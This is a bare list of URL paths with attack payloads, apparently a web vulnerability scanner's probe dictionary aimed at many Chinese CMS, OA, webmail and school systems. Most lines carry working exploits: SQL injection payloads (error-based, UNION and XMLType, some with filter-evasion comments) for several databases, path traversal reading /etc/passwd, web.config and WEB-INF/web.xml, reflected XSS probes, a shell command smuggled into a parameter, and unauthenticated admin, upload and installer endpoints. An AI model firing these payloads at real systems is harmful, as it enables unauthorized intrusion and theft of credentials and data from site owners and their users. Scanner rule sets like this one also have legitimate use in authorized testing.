/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
